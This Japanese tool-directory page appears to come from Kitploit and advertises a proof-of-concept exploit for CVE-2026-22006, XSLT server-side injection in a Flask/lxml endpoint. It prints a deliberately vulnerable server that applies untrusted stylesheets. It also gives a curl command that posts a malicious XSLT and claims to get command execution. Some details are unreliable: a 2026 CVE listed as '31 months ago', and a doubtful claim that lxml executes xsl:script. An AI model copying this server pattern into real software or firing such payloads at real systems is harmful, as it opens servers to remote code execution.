Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22006-XSLT-Server-Side-Injection-via-xsl-script- — CVE-2026-22006 の概念実証 (PoC) です。lxml Flask エンドポイントにおける xsl:script を介した XSLT サーバーサイドインジェクションを実証し、リモートコード実行 (RCE) を達成します。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-22006-xslt-server-side-injection-via-xsl-script-
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubgeorge0papasotiriou/cve-2026-22006-xslt-server-side-injection-via-xsl-script-

CVE-2026-22006-XSLT-Server-Side-Injection-via-xsl-script-

CVE-2026-22006 の概念実証 (PoC) です。lxml Flask エンドポイントにおける xsl:script を介した XSLT サーバーサイドインジェクションを実証し、リモートコード実行 (RCE) を達成します。

リポジトリを見る
31ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-22006 – xsl:script による XSLT サーバーサイドインジェクション

プログラムコード(Python + XSLT)

root@kitploit:~
# xslt_server.py - Applies user-supplied XSLT to XML
from lxml import etree
from flask import Flask, request

app = Flask(__name__)
@app.route('/transform', methods=['POST'])
def transform():
    xml = request.form['xml']
    xslt = request.form['xslt']
    xml_doc = etree.fromstring(xml.encode())
    xslt_doc = etree.fromstring(xslt.encode())
    transform = etree.XSLT(xslt_doc)
    result = transform(xml_doc)
    return str(result)

if __name__ == '__main__':
    app.run(port=5000)

CVE-2026-22006 – xsl:script による XSLT サーバーサイドインジェクション

Severity: Critical

概要

XML変換サービスが信頼できないXSLTスタイルシートを受け入れ、スクリプト拡張を無効にせずに適用します。攻撃者は xsl:script やプロセッサ固有の関数(例: PHP の php:function)を埋め込むことで、サーバー上で任意のコードを実行できます。

脆弱性の詳細

  • タイプ: コードインジェクション
  • 影響: リモートコード実行。
  • 根本原因: XSLTプロセッサが拡張関数を有効にした状態で構成されており、システムコマンドを直接呼び出すことが可能です。

エクスプロイトの実演

  1. サーバーを起動します:
    root@kitploit:~
    pip install flask lxml
    python xslt_server.py
    
  2. XMLとともに悪意のあるXSLTを送信します:
    root@kitploit:~
    curl -X POST -d "xml=<root/>" --data-urlencode "[email protected]" http://localhost:5000/transform
    

サーバーは id の出力を返します。

ツールをダウンロード